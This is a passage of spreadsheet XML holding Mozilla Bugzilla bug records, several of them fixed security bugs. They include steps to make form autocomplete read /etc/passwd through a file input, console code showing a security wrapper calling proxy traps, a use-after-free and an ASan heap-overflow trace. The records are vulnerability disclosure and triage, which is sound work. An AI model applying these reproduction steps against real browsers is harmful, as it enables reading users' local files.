      <c r="U1628" t="n">
        <v>0</v>
      </c>
      <c r="V1628" t="n">
        <v>27</v>
      </c>
      <c r="W1628" t="inlineStr">
        <is>
          <t>Running marionette tests on debug emulator build crashes with a compartment mismatch error.
https://tbpl.mozilla.org/php/getParsedLog.php?id=29907361&amp;tree=Pine&amp;full=1
The interesting thing here is that sending a single message works but sending multiple ones doesn't:
INFO -  10-31 01:37:16.624    45    45 I Gecko   : MARIONETTE TEST RESULT:TEST-PASS | test_outgoing.js | the messages got from onsent event and request result must be the same - 1383197833446 should equal 1383197833446
22:39:02     INFO -  10-31 01:37:16.634    45    45 I Gecko   : MARIONETTE LOG: INFO: Done!
22:39:02     INFO -  10-31 01:37:16.863    45    45 I Gecko   : MARIONETTE LOG: INFO: Testing sending message to multiple receivers:
INFO -  10-31 01:37:16.883    45    45 F MOZ_CRASH: Hit MOZ_CRASH() at ../../../gecko/js/src/jscntxtinlines.h:40
We don't have a stack :(</t>
        </is>
      </c>
      <c r="X1628" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1629">
      <c r="A1629" t="n">
        <v>1110557</v>
      </c>
      <c r="B1629" t="inlineStr">
        <is>
          <t>2014-12-11 17:26:09 -0800</t>
        </is>
      </c>
      <c r="C1629" t="inlineStr">
        <is>
          <t>Arbitrary File Read Vulnerability via Form Autocomplete</t>
        </is>
      </c>
      <c r="D1629" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:53 -0700</t>
        </is>
      </c>
      <c r="E1629" t="n">
        <v>1</v>
      </c>
      <c r="F1629" t="n">
        <v>1</v>
      </c>
      <c r="G1629" t="n">
        <v>3</v>
      </c>
      <c r="H1629" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1629" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1629" t="inlineStr">
        <is>
          <t>Autocomplete</t>
        </is>
      </c>
      <c r="K1629" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L1629" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1629" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1629" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1629" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1629" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q1629" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1629" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1629" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T1629" t="n">
        <v>1</v>
      </c>
      <c r="U1629" t="n">
        <v>0</v>
      </c>
      <c r="V1629" t="n">
        <v>49</v>
      </c>
      <c r="W1629" t="inlineStr">
        <is>
          <t>Created attachment 8535327
auto.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Build ID: 20141201171754
Steps to reproduce:
- Create a &lt;input type="text"&gt; field.
- Make sure, that the field's autocompletion will suggest "/etc/passwd" when triggered.
- Open the completion dropdown menu (which should solely suggest "/etc/passwd") by clicking in the text box or pressing the appropriate keys.
- With the menu still open, change the input type from "text" to "file".
- Although the input type changed, the completion menu does not dissapear and you will still be able to accept the filename as an autocompletion value.
- After completion the file picker has changed its value to "/etc/passwd" and will thus immediately make the file contents available to the DOM.
Confirmed on 3.17.4-1-ARCH x86_64 GNU/Linux.
Actual results:
If you try to change the value of a &lt;input&gt; field with type=file, you will get a security violation error. This restriction does not apply to chrome UI elements, though. The autocompletion box can therefore be abused the change otherwise inaccessible values and bypass the file upload dialogue.
The attached proof of concept outlines a possible real-life scenario, which tries to minimize the necessary user interactions to a simple double click. (Just for the record, there should be several ways to conceal the whole autocompletion process even more, making the attack much less obvious than depicted here, but probably resulting in a less stable and bloated PoC.)
Expected results:
The attempt of autocompleting a file upload form field should trigger a security error.</t>
        </is>
      </c>
      <c r="X1629" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1630">
      <c r="A1630" t="n">
        <v>1138775</v>
      </c>
      <c r="B1630" t="inlineStr">
        <is>
          <t>2015-03-02 19:03:55 -0800</t>
        </is>
      </c>
      <c r="C1630" t="inlineStr">
        <is>
          <t>Bare HTML short link on SUMO</t>
        </is>
      </c>
      <c r="D1630" t="inlineStr">
        <is>
          <t>2015-10-15 10:03:50 -0700</t>
        </is>
      </c>
      <c r="E1630" t="n">
        <v>1</v>
      </c>
      <c r="F1630" t="n">
        <v>1</v>
      </c>
      <c r="G1630" t="n">
        <v>5</v>
      </c>
      <c r="H1630" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1630" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1630" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1630" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1630" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1630" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1630" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1630" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1630" t="inlineStr">
        <is>
          <t>u=users c=wiki p=1 s=2015.3</t>
        </is>
      </c>
      <c r="Q1630" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1630" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1630" t="inlineStr">
        <is>
          <t>2015Q1</t>
        </is>
      </c>
      <c r="T1630" t="n">
        <v>1</v>
      </c>
      <c r="U1630" t="n">
        <v>0</v>
      </c>
      <c r="V1630" t="n">
        <v>5</v>
      </c>
      <c r="W1630" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.35 Safari/537.36
Steps to reproduce:
1) Visit https://support.mozilla.org/en-US/kb/which-browsers-will-work-firefox-hello-video-chat
2) Scroll to the bottom, see "Share this article text"
Actual results:
mzl.la link appears HTML-escaped, as "&lt;a href="http://mzl.la/1tDO7wj"&gt;http://mzl.la/1tDO7wj&lt;/a&gt;"
Expected results:
A hyperlink should appear.</t>
        </is>
      </c>
      <c r="X1630" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1631">
      <c r="A1631" t="n">
        <v>480503</v>
      </c>
      <c r="B1631" t="inlineStr">
        <is>
          <t>2009-02-26 23:55:21 -0800</t>
        </is>
      </c>
      <c r="C1631" t="inlineStr">
        <is>
          <t>Can't search for stack frames beyond the top frame in socorro</t>
        </is>
      </c>
      <c r="D1631" t="inlineStr">
        <is>
          <t>2016-08-09 01:49:44 -0700</t>
        </is>
      </c>
      <c r="E1631" t="n">
        <v>1</v>
      </c>
      <c r="F1631" t="n">
        <v>1</v>
      </c>
      <c r="G1631" t="n">
        <v>4</v>
      </c>
      <c r="H1631" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1631" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1631" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K1631" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1631" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1631" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1631" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1631" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1631" t="inlineStr">
        <is>
          <t>[search]</t>
        </is>
      </c>
      <c r="Q1631" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1631" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1631" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1631" t="n">
        <v>1</v>
      </c>
      <c r="U1631" t="n">
        <v>1</v>
      </c>
      <c r="V1631" t="n">
        <v>54</v>
      </c>
      <c r="W1631" t="inlineStr">
        <is>
          <t>With the latest upgrade the search ui was updated too. Now it is not possible anymore to search for frames which occur at least the second level. You can only search for frames on top of the stack.
We should revert this change because searching under the first 10 frames was really helpful when you have an address only as the top frame. How should those searches be performed now?</t>
        </is>
      </c>
      <c r="X1631" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1632">
      <c r="A1632" t="n">
        <v>1392026</v>
      </c>
      <c r="B1632" t="inlineStr">
        <is>
          <t>2017-08-19 17:44:54 -0700</t>
        </is>
      </c>
      <c r="C1632" t="inlineStr">
        <is>
          <t>ExposedPropertiesOnly::check calls proxy traps "has" and "getOwnPropertyDescriptor" for property "__exposedProps__"</t>
        </is>
      </c>
      <c r="D1632" t="inlineStr">
        <is>
          <t>2018-11-05 14:01:30 -0800</t>
        </is>
      </c>
      <c r="E1632" t="n">
        <v>1</v>
      </c>
      <c r="F1632" t="n">
        <v>1</v>
      </c>
      <c r="G1632" t="n">
        <v>3</v>
      </c>
      <c r="H1632" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1632" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1632" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1632" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1632" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1632" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1632" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1632" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1632" t="inlineStr">
        <is>
          <t>[adv-main57+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1632" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1632" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1632" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1632" t="n">
        <v>1</v>
      </c>
      <c r="U1632" t="n">
        <v>0</v>
      </c>
      <c r="V1632" t="n">
        <v>20</v>
      </c>
      <c r="W1632" t="inlineStr">
        <is>
          <t>Open the browser console and enter this code:
    var proxy = new Proxy({}, new Proxy({}, {get: (_, trap) =&gt; (_, ...args) =&gt; {
        throw new Error(`proxy trap ${JSON.stringify(trap)} was called with arguments ${args.map(JSON.stringify).join(", ")}.`);
    }}));
    var sandbox = Cu.Sandbox(null);
    sandbox.inheritsProxy = Object.create(proxy);
    sandbox.eval(`Reflect.apply(inheritsProxy, null, [])`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
    sandbox.eval(`Reflect.defineProperty(inheritsProxy, "a", {})`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
    sandbox.eval(`Reflect.deleteProperty(inheritsProxy, "a", {})`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
    sandbox.eval(`Reflect.get(inheritsProxy, "a")`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
    sandbox.eval(`Reflect.getOwnPropertyDescriptor(inheritsProxy, "a")`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
    sandbox.eval(`Reflect.has(inheritsProxy, "a")`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
    sandbox.eval(`Reflect.ownKeys(inheritsProxy)`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
    sandbox.eval(`Reflect.set(inheritsProxy, "a", 1)`);
    // Error: proxy trap "has" was called with arguments "__exposedProps__".
This should not happen. It does not happen if I use one of these:
    sandbox.inheritsProxy = Object.setPrototypeOf(function(){}, proxy);
    sandbox.inheritsProxy = Object.setPrototypeOf([], proxy);
    sandbox.inheritsProxy = proxy;
Then I only get "Permission denied" errors. So how come the proxy trap runs with Object.create(proxy) ?
The security wrapper is calling traps instead of protecting the proxy!!
This seems like a flag of the security wrapper, so I'm marking this as security sensitive.</t>
        </is>
      </c>
      <c r="X1632" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1633">
      <c r="A1633" t="n">
        <v>824643</v>
      </c>
      <c r="B1633" t="inlineStr">
        <is>
          <t>2012-12-25 13:38:35 -0800</t>
        </is>
      </c>
      <c r="C1633" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsTreeBodyFrame::UpdateScrollbars</t>
        </is>
      </c>
      <c r="D1633" t="inlineStr">
        <is>
          <t>2017-05-09 11:27:38 -0700</t>
        </is>
      </c>
      <c r="E1633" t="n">
        <v>1</v>
      </c>
      <c r="F1633" t="n">
        <v>1</v>
      </c>
      <c r="G1633" t="n">
        <v>3</v>
      </c>
      <c r="H1633" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1633" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1633" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1633" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1633" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1633" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1633" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1633" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1633" t="inlineStr">
        <is>
          <t>[adv-main20+]</t>
        </is>
      </c>
      <c r="Q1633" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1633" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1633" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T1633" t="n">
        <v>1</v>
      </c>
      <c r="U1633" t="n">
        <v>0</v>
      </c>
      <c r="V1633" t="n">
        <v>6</v>
      </c>
      <c r="W1633" t="inlineStr">
        <is>
          <t>STR: load layout/xul/base/src/tree/src/409807-1.xul in an ASan build compiled
with -DDEBUG_TRACEMALLOC_PRESARENA
   871  nsTreeBodyFrame::UpdateScrollbars(const ScrollParts&amp; aParts)
   872  {
   873    nscoord rowHeightAsPixels = nsPresContext::AppUnitsToIntCSSPixels(mRowHeight);
   874  
   875    if (aParts.mVScrollbar) {
   876      nsAutoString curPos;
   877      curPos.AppendInt(mTopRowIndex*rowHeightAsPixels);
   878      aParts.mVScrollbarContent-&gt;
   879        SetAttr(kNameSpaceID_None, nsGkAtoms::curpos, curPos, true);
   880    }
   881  
   882    if (aParts.mHScrollbar) {
   883      nsAutoString curPos;
   884      curPos.AppendInt(mHorzPosition);
   885      aParts.mHScrollbarContent-&gt;
   886        SetAttr(kNameSpaceID_None, nsGkAtoms::curpos, curPos, true);
   887    }
   888  }
The SetAttr causes the frame to be destroyed, so we'll read some poisoned
value for this-&gt;mHorzPosition on line 884.  aParts.mHScrollbarContent
is a strong ref.  It looks harmless at first glance, but filing the
bug as Security-Sensitive just in case.</t>
        </is>
      </c>
      <c r="X1633" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1634">
      <c r="A1634" t="n">
        <v>508189</v>
      </c>
      <c r="B1634" t="inlineStr">
        <is>
          <t>2009-08-03 21:42:44 -0700</t>
        </is>
      </c>
      <c r="C1634" t="inlineStr">
        <is>
          <t>[SECURITY] Logging in after resetting your password exposes your new password in the URL</t>
        </is>
      </c>
      <c r="D1634" t="inlineStr">
        <is>
          <t>2010-03-29 19:16:19 -0700</t>
        </is>
      </c>
      <c r="E1634" t="n">
        <v>1</v>
      </c>
      <c r="F1634" t="n">
        <v>1</v>
      </c>
      <c r="G1634" t="n">
        <v>4</v>
      </c>
      <c r="H1634" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1634" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1634" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1634" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="L1634" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1634" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1634" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1634" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1634" t="inlineStr"/>
      <c r="Q1634" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1634" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1634" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T1634" t="n">
        <v>1</v>
      </c>
      <c r="U1634" t="n">
        <v>0</v>
      </c>
      <c r="V1634" t="n">
        <v>14</v>
      </c>
      <c r="W1634" t="inlineStr">
        <is>
          <t>For some reason or another, when I log in after changing my password on token.cgi, my password is shown in the URL. This isn't a major issue, but something that we should fix for sure.</t>
        </is>
      </c>
      <c r="X1634" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1635">
      <c r="A1635" t="n">
        <v>534051</v>
      </c>
      <c r="B1635" t="inlineStr">
        <is>
          <t>2009-12-10 14:11:09 -0800</t>
        </is>
      </c>
      <c r="C1635" t="inlineStr">
        <is>
          <t>Workers: Don't change the global object while GC is running</t>
        </is>
      </c>
      <c r="D1635" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1635" t="n">
        <v>1</v>
      </c>
      <c r="F1635" t="n">
        <v>1</v>
      </c>
      <c r="G1635" t="n">
        <v>3</v>
      </c>
      <c r="H1635" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1635" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1635" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1635" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1635" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1635" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1635" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1635" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1635" t="inlineStr">
        <is>
          <t>[sg:critical?] fixes 533000</t>
        </is>
      </c>
      <c r="Q1635" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1635" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1635" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T1635" t="n">
        <v>1</v>
      </c>
      <c r="U1635" t="n">
        <v>0</v>
      </c>
      <c r="V1635" t="n">
        <v>19</v>
      </c>
      <c r="W1635" t="inlineStr">
        <is>
          <t>We're setting the global object on the context from another thread outside of a request. That's bad according to all sane peers, so we should stop. Also, I think we should check request depth inside JS_SetGlobalObject.</t>
        </is>
      </c>
      <c r="X1635" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1636">
      <c r="A1636" t="n">
        <v>1020219</v>
      </c>
      <c r="B1636" t="inlineStr">
        <is>
          <t>2014-06-04 03:13:12 -0700</t>
        </is>
      </c>
      <c r="C1636" t="inlineStr">
        <is>
          <t>Fix a bug that can cause DataSourceSurface buffers to be smaller than the DataSourceSurface expects them to be</t>
        </is>
      </c>
      <c r="D1636" t="inlineStr">
        <is>
          <t>2017-03-17 05:32:12 -0700</t>
        </is>
      </c>
      <c r="E1636" t="n">
        <v>1</v>
      </c>
      <c r="F1636" t="n">
        <v>1</v>
      </c>
      <c r="G1636" t="n">
        <v>3</v>
      </c>
      <c r="H1636" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1636" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1636" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1636" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1636" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1636" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1636" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1636" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1636" t="inlineStr">
        <is>
          <t>[adv-main31+][qa-]</t>
        </is>
      </c>
      <c r="Q1636" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1636" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1636" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T1636" t="n">
        <v>1</v>
      </c>
      <c r="U1636" t="n">
        <v>0</v>
      </c>
      <c r="V1636" t="n">
        <v>20</v>
      </c>
      <c r="W1636" t="inlineStr">
        <is>
          <t>Yikes. In SourceSurfaceAlignedRawData::Init and SourceSurfaceAlignedRawData::InitWithStride the temporary that is passed to Realloc may not have enough precision to store the result of |mStride * aSize.height|. That can cause us to have a buffer that is much smaller than the DataSourceSurface expects and needs it to be.</t>
        </is>
      </c>
      <c r="X1636" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1637">
      <c r="A1637" t="n">
        <v>1288588</v>
      </c>
      <c r="B1637" t="inlineStr">
        <is>
          <t>2016-07-21 19:45:03 -0700</t>
        </is>
      </c>
      <c r="C1637" t="inlineStr">
        <is>
          <t>PNG: heap-buffer-overflow crash [@MOZ_PNG_read_filt_row_a]</t>
        </is>
      </c>
      <c r="D1637" t="inlineStr">
        <is>
          <t>2017-02-09 07:55:56 -0800</t>
        </is>
      </c>
      <c r="E1637" t="n">
        <v>1</v>
      </c>
      <c r="F1637" t="n">
        <v>1</v>
      </c>
      <c r="G1637" t="n">
        <v>3</v>
      </c>
      <c r="H1637" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1637" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1637" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1637" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1637" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1637" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1637" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1637" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1637" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q1637" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1637" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1637" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T1637" t="n">
        <v>1</v>
      </c>
      <c r="U1637" t="n">
        <v>0</v>
      </c>
      <c r="V1637" t="n">
        <v>79</v>
      </c>
      <c r="W1637" t="inlineStr">
        <is>
          <t>The following testcase crashes on en-us.linux-x86_64-asan.tar.bz2 revision 0684715b032f06273416fdc554c071ee61a889db
See attachment.
Backtrace:
==5608==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000321503 at pc 0x7f5a6880760e bp 0x7f5a47afdaf0 sp 0x7f5a47afdae8
READ of size 16 at 0x610000321503 thread T32 (ImgDecoder #1)
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Unknown image format 16 (t=3.91881) |[6481][GFX1]: Unknown image format 16 (t=286.938) |[6467][GFX1]: Unknown image format 16 (t=286.437) |[6468][GFX1]: Unknown image format 16 (t=286.471) |[6469][GFX1]: Unknown image format 16 (t=286.504) |[6470][GFX1]: Unknown image format 16 (t=286.537) |[6471][GFX1]: Unknown image format 16 (t=286.588) |[6472][GFX1]: Unknown image format 16 (t=286.604) |[6473][GFX1]: Unknown image format 16 (t=286.637) |[6474][GFX1]: Unknown image format 16 (t=286.671) |[6475][GFX1]: Unknown image format 16 (t=286.704) |[6476][GFX1]: Unknown image format 16 (t=286.737) |[6477][GFX1]: Unknown image format 16 (t=286.771) |[6478][GFX1]: Unknown image format 16 (t=286.804) |[6479][GFX1]: Unknown image format 16 (t=286.854) |[6480][GFX1]: Unknown image format 16 (t=286.888) [GFX1]: Unknown image format 16
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Unknown image format 16 (t=3.91881) |[6481][GFX1]: Unknown image format 16 (t=286.938) |[6482][GFX1]: Unknown image format 16 (t=286.971) |[6468][GFX1]: Unknown image format 16 (t=286.471) |[6469][GFX1]: 
[...]
Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #0 0x7f5a6880760d in MOZ_PNG_read_filt_row_a /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngrutil.c:4017:31
    #1 0x7f5a687e7b02 in MOZ_PNG_read_filt_row /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngrutil.c:4170:7
    #2 0x7f5a687e7b02 in MOZ_PNG_push_proc_row /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:905
    #3 0x7f5a687e71f6 in MOZ_PNG_proc_IDAT_data /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:873:13
    #4 0x7f5a687df5fe in MOZ_PNG_push_read_IDAT /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:754:7
    #5 0x7f5a687db137 in MOZ_PNG_proc_some_data /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:115:10
    #6 0x7f5a687db137 in MOZ_PNG_process_data /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:46
    #7 0x7f5a622b7e69 in mozilla::image::nsPNGDecoder::ReadPNGData(char const*, unsigned long) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:379:3
    #8 0x7f5a622b588f in operator() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:362:16
    #9 0x7f5a622b588f in Lex&lt;(lambda at /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:359:21)&gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/StreamingLexer.h:382
    #10 0x7f5a622b588f in mozilla::image::nsPNGDecoder::DoDecode(mozilla::image::SourceBufferIterator&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:358
    #11 0x7f5a6221d4ca in mozilla::image::Decoder::Decode(mozilla::NotNull&lt;mozilla::image::IResumable*&gt;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:155:44
    #12 0x7f5a6222f996 in mozilla::image::DecodingTask::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/IDecodingTask.cpp:88:17
    #13 0x7f5a6223d332 in mozilla::image::DecodePoolWorker::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:187:11
    #14 0x7f5a5fa74b86 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #15 0x7f5a5faf2f6c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Unknown image format 16 (t=3.91881) |[6616][GFX1]: Unknown image format 16 (t=291.104) |[6617][GFX1]: Unknown image format 16 (t=291.171) |[6603][GFX1]: Unknown image format 16 (t=290.705) |[6604][GFX1]: Unknown image format 16 (t=290.738) |[6605][GFX1]: Unknown image format 16 (t=290.771) |[6606][GFX1]: Unknown image format 16 (t=290.805) |[6607][GFX1]: Unknown image format 16 (t=290.854) |[6608][GFX1]: Unknown image format 16 (t=290.871) |[6609][GFX1]: Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
